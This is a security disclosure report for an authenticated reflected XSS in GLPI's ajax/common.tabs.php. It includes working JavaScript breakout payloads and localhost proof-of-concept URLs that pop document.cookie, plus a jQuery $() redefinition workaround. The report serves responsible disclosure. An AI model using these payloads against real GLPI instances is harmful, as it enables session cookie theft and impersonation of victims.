Authenticated Reflected XSS on ajax/common.tabs.php in glpi-project/glpi
Reported on
Dec 12th 2022
Description
There is a reflected XSS vulnerability on ajax/common.tabs.php due to the KnowBase tab not escaping the start parameter properly (probably because it's not reflected inside quotes).
There was some work into getting the exploit working, due to JQuery's $() not being defined and causing a ReferenceError. This could be bypassed by re-defining a function with the same name that does nothing and then procceeding to write the payload after. After some tweaking, the payload looked like this:
1})}});alert(document.cookie);(function a(){function b(){(function c(){
Proof-of-Concept (PoC)
This PoC will trigger an alert containing the browser cookies.
http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);(function%20a(){function%20b(){(function%20c(){
Impact
An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate session cookies.
I have provided the wrong PoC. The following PoC includes the undefined JQuery bypass.
http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);function%20$(a){};(function%20a(){function%20b(){(function%20c(){
@admin we reevaluated the severity to 4.8 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N). Could you please change this ?
https://github.com/glpi-project/glpi/security/advisories/GHSA-352j-wr38-493c
